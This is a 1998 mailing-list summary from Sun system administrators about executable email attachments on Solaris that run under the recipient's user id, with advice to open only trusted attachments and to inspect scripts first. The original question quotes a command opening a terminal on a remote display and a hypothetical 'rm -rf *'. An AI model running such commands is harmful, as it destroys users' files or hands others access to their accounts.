Summary : Security thru emails ...

From: Pravin Chavan (prchavan@pcs.cv.com)
Date: Fri Jul 17 1998 - 04:04:12 CDT


Hi Sunners,

The unanimous consensus is that this is

a recognized security issue and the only

solution is to be careful when executing

these attachments. Execute onlu those

which come from a trusted source.

The following suggestion was made by Casper

Dik:

It's a recognized security issue; the only way around this is
fireing up binder and changing the action for all such programs
from "$FILE" to something other (like textedit $FILE)

but that also affects filemgr's ability to execute the files.
----------------

DBell@mobile.bam.com came up with the following hint:

As far as I know, there is no way to "prevent" this problem. You really need to simply avoid executing random code that people send you. I'd suggest you carefully examine any enclosure (examine the code if it's a script, use strings if it's a binary) before you even consider allowing it to run on your machine. Of course, if an enclosure is a binary file, that seriously limits how much you can discover about its purpose.
-----------------

Thanks to the following for their responses:

Stephen Harris <sweh@mpn.com>
Casper Dik <casper@holland.Sun.COM>
"Boyko, Steve" <SBoyko@nbpower.com>
"Ian Wallace" <iwallace@bcoe.bm>
DBell@mobile.bam.com
Bruce Bowler <bbowler@bigelow.org>
Tim Carlson <tim@santafe.edu>
Daniel Stringfield <dstringf@fccjmail.fccj.cc.fl.us>
Rich Pieri <rich.pieri@prescienttech.com>
Jochen Bern <bern@penthesilea.uni-trier.de>
Gianluca Rotoni <gianluca@tell.ascom.ch>
thadm@oregonian.com (Thad MacMillan)
foster@bial1.ucsd.edu
Jonathan.Loh@BankAmerica.com
Jamie Lawrence <jal@ThirdAge.com>
"Steve Phelps" <phelpss@ozemail.com.au>
------------------

Original Question:

Hi Sun-managers,

Recently I got an email with an executable

as an attachment. I double clicked on it

and it executed to open a window on another

host (on the same network segment). But this

window was opened with my id !!!. This exec. was in C,

probably a statement like

"system ('setenv DISPLAY rhost; /usr/openwin/bin/cmdtool')".

I am wondering that if I send a script which has

"rm -rf *" command, will it remove all files of the

user who receives this email? If yes, then this is

a serious security issue. How do i stop this ???

BTW, we are using Solaris 2.5.1, sendmail V8.8.1 and

mailtool V3.5.1. Please enlighten me on this.

Will summarize.

Regards,

Pravin
prchavan@pcsbom.patni.com
Thanks



This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:12:44 CDT